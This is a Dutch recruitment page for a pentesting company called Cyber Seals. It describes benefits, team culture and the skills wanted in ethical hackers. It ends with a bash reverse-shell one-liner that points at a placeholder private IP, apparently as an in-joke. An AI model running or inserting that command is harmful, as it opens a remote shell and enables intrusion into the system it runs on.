JOIN US, WE’VE GOT COOKIES

Usermod –a –G “Cyber Seals” `whoami`

Een echte Seal word je niet zomaar. Wij maken blockchain cloud slimmer, bedenken samen manieren om Vim af te sluiten, en zijn overal op voorbereid. Cybersecurity zit ons in het bloed en puzzels oplossen doen wij met de ogen dicht.

Weet jij ook hoe je ASCII art maakt in bash en vertel je mensen graag over de hacker die Zerocool heet? Draag jij een hoodie? Dan zijn wij op zoek naar jou!

Je krijgt:

Een vast contract.

Een concurrerend salaris, riante winstuitkering en een laptop naar keuze.

Vrije keuze leaseauto of een mobiliteitsbudget.

Innoverende projecten bij toonaangevende opdrachtgevers.

Gewone mensen met een grote passie

Cyber Seals worden gedreven door passie én kennis. Zelfstandig een test van intake tot rapport afronden, daar draai jij je hand niet voor om. Maar we blijven ook gewoon mensen. We zijn een klein, hecht team dat graag samenwerkt. Ieder op een eigen eiland werkend aan een opdracht, daar zijn we niet van. Liever storten we ons samen op een klus. Zwepen we elkaar op met nieuwe ideeën en suggesties. En vieren we de successen uitgebreid met elkaar.

“Bij Cyber Seals delen we een fascinatie voor de inhoud, en zien wij het als onze verantwoordelijkheid om beveiliging voor iedereen hanteerbaar te maken.”

Werken als ethische hacker

Je branduren verdiend

De ene Seal begon met sloten ‘lockpicken’ met een haarspeld, en ging vanaf zijn tienerjaren software hacken. Een andere zat vaker wél achter zijn computer dan niet, en rondde vanzelfsprekend een IT-opleiding af. Kortom: jouw branduren zijn maximaal.

Jij stopt niet totdat je jouw weg naar binnen hebt gevonden. Jij absorbeert nieuwe technieken en onderzoeken als een spons. Cybersecurity is je tweede taal. Dan heb je aan ons een goede gesprekspartner.

Je hebt een passie voor Informatie beveiliging| Je stopt niet voordat het project af is | Je hebt jarenlange ervaring | Cybersecurity is je tweede taal

Specialistische kennis versus mensentaal: 1-1!

Black box testen, buffer overflows, reverse shells, defacing: wij hoeven jou niet te vertellen wat we bedoelen. De taal van cybersecurity spreek jij als je moedertaal. En je bent als een vis in het water als het aankomt op het onderzoeken van systemen. Je kunt meer dan alleen een MSF-module laden, en loopt niet vast als het stukje copy-paste Python niet meteen werkt.

Tegelijkertijd weet jij ook dat onze opdrachtgever niet ingevoerd hoeft te zijn in alle termen. Die wordt niet gelukkig van zaken als ‘key derivation function’ of ‘server-side request forgery’. Wel van een duidelijke uitleg over waar zich zwakke plekken bevinden en wat er aan te verbeteren valt. In normale-mensentaal dus. Gelukkig is die vertaalslag voor jou geen enkel probleem.

Vrijheid en passende opdrachten

Als Seal voer jij korte opdrachten uit of zit jij langere tijd bij een bedrijf gestationeerd. Bijvoorbeeld bij een bank of overheidsinstelling. Op de ene klus zit jij drie maanden. De andere duurt soms een jaar. Dan voer je dus niet eenmalig een pentest uit, maar test je continu de cybersecurity van het bedrijf.

Wij bieden je alle vrijheid om te bepalen waar jij graag werkt. En past een opdracht toch niet (meer)? Dan vinden we een andere plaats voor je. Jij geeft zelf aan wat je graag wilt. Zodat je werk als Cyber Seal uitdagend blijft.

Evenementen

Wij Seals zitten niet stil. We spijkeren onze kennis continu bij. We volgen regelmatig met z’n allen cursussen of gaan naar conferenties. De pizzasessies waarin we samen hacks uitvoeren en van elkaar leren zijn een begrip binnen ons team. Net als onze andere gezamenlijke activiteiten. F1-racen, vliegen in een simulator of een tripje naar buitenlandse conferenties: je mag het allemaal verwachten bij Cyber Seals.

Jij staat te trappelen om een Seal te worden. Om je onder mede-hackers te bevinden. En dan hebben wij nog niet eens onze arbeidsvoorwaarden aan je verteld. Want voor onze Seals zorgen we uiteraard ook op dat vlak meer dan goed. Wij vertellen je er alles over.

bash -i >& /dev/tcp/10.0.0.0/1337 0>&1